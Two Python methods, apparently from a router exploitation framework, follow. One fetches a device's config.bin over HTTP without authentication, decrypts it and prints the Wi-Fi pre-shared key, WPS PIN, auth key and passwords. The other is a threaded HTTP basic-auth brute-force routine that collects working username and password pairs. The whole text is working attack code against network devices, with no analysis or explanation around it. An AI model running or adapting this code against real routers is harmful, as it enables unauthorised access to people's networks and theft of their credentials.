def run(self): if self.check(): print_success("Target is vulnerable") url = "{}:{}/config.bin".format(self.target, self.port) print_status("Sending payload request") response = http_request(method="GET", url=url) if response is not None and response.status_code == 200: print_success("Exploit success") print_status("Reading file config.bin") password, authKey, cPskSecret, cUsrPIN = self.decrypt_config_bin( response.content) print_success("Found cPskSecret:" + cPskSecret) print_success("Found cUsrPIN:" + cUsrPIN) print_success("Found authKey:" + authKey) print_success("Password combination from top to bottom:" + '\n' + password) else: print_error("Exploit failed. Device seems to be not vulnerable.")
def target_function(self, url, creds): name = threading.current_thread().name user, password = creds user = user.encode('utf-8').strip() password = password.encode('utf-8').strip() response = http_request(method="GET", url=url, auth=(user, password)) if response is not None and response.status_code != 401: print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=self.verbosity) self.credentials.append((self.target, self.port, user, password)) if self.stop_on_success: raise StopThreadPoolExecutor else: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=self.verbosity)